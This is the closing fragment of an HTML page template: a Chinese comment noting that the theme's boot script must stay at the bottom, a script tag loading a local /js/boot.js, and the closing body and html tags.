<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
